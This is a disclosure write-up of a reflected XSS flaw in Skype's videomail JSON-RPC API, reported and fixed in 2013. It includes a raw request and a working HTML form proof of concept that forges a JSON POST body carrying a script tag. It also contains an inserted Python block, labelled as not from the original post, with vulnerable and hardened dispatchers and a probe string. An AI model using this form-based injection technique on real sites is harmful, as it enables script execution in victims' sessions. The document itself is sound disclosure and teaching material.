XSS in Skype's videomail API

More than a year ago, we discovered a small XSS in Skype’s videomail API which landed us a warm place in Microsoft’s HoF.

Back then, Tim and Sebastian met up in Detmold to hack around a bit. Tim wanted to check out the new Skype feature Videomail and sent one to Sebastian. The email notification contained a link to a website and a PIN code.

The website used the PIN code within an AJAX request to the host vm.skype.com. Both the request and the response were formatted as JSON, and the responses had the correct application/javascript content-type set.

However, if you set the `method` parameter to an invalid value, the server returned a text/html response (still JSON-formatted) telling you that the method couldn't be found, with the method name reflected into the body.

The request looked like this:

POST /api/jsonrpc HTTP/1.1
Host: vm.skype.com
Content-Length: 157
Content-Type: text/plain

{"method":"skype.videomail.get_with_pin","params":["xxx","yyy","zzz"]}

To build the PoC we had to use a little trick to create a POST request with a JSON body out of a normal HTML form.

<form action="https://vm.skype.com/api/jsonrpc" id="xss" method="post" enctype="text/plain">
 <input type="text" name='{"foo":"' value='bar","method":"skype.videomail.get_with_pin<script>alert(document.domain)</script>","params":["xxx","yyy","zzz"]}'>
</form>

We simply add a new key/value pair: the input element's name attribute is set to {"foo":" and its value attribute contains the rest of the JSON string. With the form's enctype attribute set to text/plain, the browser encodes the field as name=value, so the "=" lands inside the dummy "foo" string and the rest parses as valid JSON. The final result is:

{"foo":"=bar","method":"skype.videomail.get_with_pin<script>alert(document.domain)</script>","params":["xxx","yyy","zzz"]}
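As an added illustration of the fix (not code from the original post or from Skype), the following Python sketch contrasts a JSON-RPC dispatcher with the behaviour described above against a hardened one; `METHODS`, `dispatch_vulnerable`, `dispatch_hardened`, `response_reflects_html` and `PROBE` are constructed names, and the probe body is a constructed stand-in for the PoC payload.

```python
import json

# Constructed stand-in for the endpoint's method table; not Skype's real dispatcher.
METHODS = {"skype.videomail.get_with_pin": lambda params: {"status": "ok"}}

def dispatch_vulnerable(content_type, body):
    """Behaviour described in the post: any Content-Type is accepted and an
    unknown method name is reflected into a text/html error response."""
    req = json.loads(body)
    method = req.get("method", "")
    if method not in METHODS:
        return 200, {"Content-Type": "text/html"}, json.dumps(
            {"error": "Method '%s' not found" % method})
    return 200, {"Content-Type": "application/javascript"}, json.dumps(
        {"result": METHODS[method](req.get("params", []))})

SAFE_HEADERS = {"Content-Type": "application/json; charset=utf-8",
                "X-Content-Type-Options": "nosniff"}

def dispatch_hardened(content_type, body):
    """Same endpoint with the three changes a reviewer would ask for."""
    # 1. A plain HTML form can only send text/plain, multipart or urlencoded
    #    bodies, so requiring application/json blocks the form trick outright.
    if not content_type.lower().startswith("application/json"):
        return 415, SAFE_HEADERS, json.dumps({"error": "expected application/json"})
    try:
        req = json.loads(body)
    except ValueError:
        return 400, SAFE_HEADERS, json.dumps({"error": "malformed JSON"})
    method = req.get("method")
    if not isinstance(method, str) or method not in METHODS:
        # 2. Error responses stay JSON with nosniff, never text/html.
        # 3. The echoed method name has < and > escaped as \u003c / \u003e so
        #    the body is inert even if some client renders it as HTML.
        out = json.dumps({"error": "method not found", "method": method})
        return 404, SAFE_HEADERS, out.replace("<", "\\u003c").replace(">", "\\u003e")
    return 200, SAFE_HEADERS, json.dumps(
        {"result": METHODS[method](req.get("params", []))})

def response_reflects_html(status, headers, body):
    """Check a tester would script against an endpoint like this: is an error
    body served as text/html while carrying raw markup from the request?"""
    ct = headers.get("Content-Type", "").lower()
    return ct.startswith("text/html") and "<" in body

# Constructed probe shaped like the post's PoC body, using a harmless marker tag.
PROBE = '{"foo":"=bar","method":"skype.videomail.get_with_pin<b>x</b>","params":[]}'
```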

Screenshots:

[Screenshot: request and response of the vulnerable endpoint]

[Screenshot: executed alert(document.domain)]

Timeline:

  • 09.08.2013 - Initial report
  • 09.08.2013 - Case-ID assigned
  • 19.08.2013 - Unconfirmed fix by the vendor
  • 25.09.2013 - Vendor asks for fix confirmation - fixed

Over and out - Team of internetwache.org